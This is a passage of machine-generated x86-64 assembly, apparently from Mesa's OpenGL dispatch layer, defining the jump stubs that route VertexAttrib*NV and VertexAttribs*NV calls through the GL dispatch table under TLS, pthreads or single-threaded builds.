GL_PREFIX(VertexAttrib2dNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5464(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 5464(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5464(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 5464(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib2dNV), .-GL_PREFIX(VertexAttrib2dNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib2dvNV)
.type GL_PREFIX(VertexAttrib2dvNV), @function
GL_PREFIX(VertexAttrib2dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5472(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5472(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5472(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5472(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib2dvNV), .-GL_PREFIX(VertexAttrib2dvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib2fNV)
.type GL_PREFIX(VertexAttrib2fNV), @function
GL_PREFIX(VertexAttrib2fNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5480(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 5480(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5480(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 5480(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib2fNV), .-GL_PREFIX(VertexAttrib2fNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib2fvNV)
.type GL_PREFIX(VertexAttrib2fvNV), @function
GL_PREFIX(VertexAttrib2fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5488(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5488(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5488(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5488(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib2fvNV), .-GL_PREFIX(VertexAttrib2fvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib2sNV)
.type GL_PREFIX(VertexAttrib2sNV), @function
GL_PREFIX(VertexAttrib2sNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5496(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5496(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5496(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5496(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib2sNV), .-GL_PREFIX(VertexAttrib2sNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib2svNV)
.type GL_PREFIX(VertexAttrib2svNV), @function
GL_PREFIX(VertexAttrib2svNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5504(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5504(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5504(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5504(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib2svNV), .-GL_PREFIX(VertexAttrib2svNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib3dNV)
.type GL_PREFIX(VertexAttrib3dNV), @function
GL_PREFIX(VertexAttrib3dNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5512(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 5512(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5512(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 5512(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib3dNV), .-GL_PREFIX(VertexAttrib3dNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib3dvNV)
.type GL_PREFIX(VertexAttrib3dvNV), @function
GL_PREFIX(VertexAttrib3dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5520(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5520(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5520(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5520(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib3dvNV), .-GL_PREFIX(VertexAttrib3dvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib3fNV)
.type GL_PREFIX(VertexAttrib3fNV), @function
GL_PREFIX(VertexAttrib3fNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5528(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 5528(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5528(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 5528(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib3fNV), .-GL_PREFIX(VertexAttrib3fNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib3fvNV)
.type GL_PREFIX(VertexAttrib3fvNV), @function
GL_PREFIX(VertexAttrib3fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5536(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5536(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5536(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5536(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib3fvNV), .-GL_PREFIX(VertexAttrib3fvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib3sNV)
.type GL_PREFIX(VertexAttrib3sNV), @function
GL_PREFIX(VertexAttrib3sNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5544(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5544(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5544(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5544(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib3sNV), .-GL_PREFIX(VertexAttrib3sNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib3svNV)
.type GL_PREFIX(VertexAttrib3svNV), @function
GL_PREFIX(VertexAttrib3svNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5552(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5552(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5552(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5552(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib3svNV), .-GL_PREFIX(VertexAttrib3svNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4dNV)
.type GL_PREFIX(VertexAttrib4dNV), @function
GL_PREFIX(VertexAttrib4dNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5560(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _x86_64_get_dispatch@PLT
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 5560(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5560(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _glapi_get_dispatch
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 5560(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4dNV), .-GL_PREFIX(VertexAttrib4dNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4dvNV)
.type GL_PREFIX(VertexAttrib4dvNV), @function
GL_PREFIX(VertexAttrib4dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5568(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5568(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5568(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5568(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4dvNV), .-GL_PREFIX(VertexAttrib4dvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4fNV)
.type GL_PREFIX(VertexAttrib4fNV), @function
GL_PREFIX(VertexAttrib4fNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5576(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _x86_64_get_dispatch@PLT
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 5576(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5576(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _glapi_get_dispatch
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 5576(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4fNV), .-GL_PREFIX(VertexAttrib4fNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4fvNV)
.type GL_PREFIX(VertexAttrib4fvNV), @function
GL_PREFIX(VertexAttrib4fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5584(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5584(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5584(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5584(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4fvNV), .-GL_PREFIX(VertexAttrib4fvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4sNV)
.type GL_PREFIX(VertexAttrib4sNV), @function
GL_PREFIX(VertexAttrib4sNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5592(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5592(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5592(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5592(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4sNV), .-GL_PREFIX(VertexAttrib4sNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4svNV)
.type GL_PREFIX(VertexAttrib4svNV), @function
GL_PREFIX(VertexAttrib4svNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5600(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5600(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5600(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5600(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4svNV), .-GL_PREFIX(VertexAttrib4svNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4ubNV)
.type GL_PREFIX(VertexAttrib4ubNV), @function
GL_PREFIX(VertexAttrib4ubNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5608(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5608(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5608(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5608(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4ubNV), .-GL_PREFIX(VertexAttrib4ubNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4ubvNV)
.type GL_PREFIX(VertexAttrib4ubvNV), @function
GL_PREFIX(VertexAttrib4ubvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5616(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5616(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5616(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5616(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4ubvNV), .-GL_PREFIX(VertexAttrib4ubvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttribPointerNV)
.type GL_PREFIX(VertexAttribPointerNV), @function
GL_PREFIX(VertexAttribPointerNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5624(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5624(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5624(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5624(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribPointerNV), .-GL_PREFIX(VertexAttribPointerNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs1dvNV)
.type GL_PREFIX(VertexAttribs1dvNV), @function
GL_PREFIX(VertexAttribs1dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5632(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5632(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5632(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5632(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs1dvNV), .-GL_PREFIX(VertexAttribs1dvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs1fvNV)
.type GL_PREFIX(VertexAttribs1fvNV), @function
GL_PREFIX(VertexAttribs1fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5640(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5640(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5640(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5640(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs1fvNV), .-GL_PREFIX(VertexAttribs1fvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs1svNV)
.type GL_PREFIX(VertexAttribs1svNV), @function
GL_PREFIX(VertexAttribs1svNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5648(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5648(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5648(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5648(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs1svNV), .-GL_PREFIX(VertexAttribs1svNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs2dvNV)
.type GL_PREFIX(VertexAttribs2dvNV), @function
GL_PREFIX(VertexAttribs2dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5656(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5656(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5656(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5656(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs2dvNV), .-GL_PREFIX(VertexAttribs2dvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs2fvNV)
.type GL_PREFIX(VertexAttribs2fvNV), @function
GL_PREFIX(VertexAttribs2fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5664(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5664(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5664(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5664(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs2fvNV), .-GL_PREFIX(VertexAttribs2fvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs2svNV)
.type GL_PREFIX(VertexAttribs2svNV), @function
GL_PREFIX(VertexAttribs2svNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5672(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5672(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5672(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5672(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs2svNV), .-GL_PREFIX(VertexAttribs2svNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs3dvNV)
.type GL_PREFIX(VertexAttribs3dvNV), @function
GL_PREFIX(VertexAttribs3dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5680(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5680(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5680(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5680(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs3dvNV), .-GL_PREFIX(VertexAttribs3dvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs3fvNV)
.type GL_PREFIX(VertexAttribs3fvNV), @function
GL_PREFIX(VertexAttribs3fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5688(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5688(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5688(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5688(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs3fvNV), .-GL_PREFIX(VertexAttribs3fvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttribs3svNV)
.type GL_PREFIX(VertexAttribs3svNV), @function
GL_PREFIX(VertexAttribs3svNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5696(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5696(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5696(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5696(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttribs3svNV), .-GL_PREFIX(VertexAttribs3svNV)
.p2align 4,,15
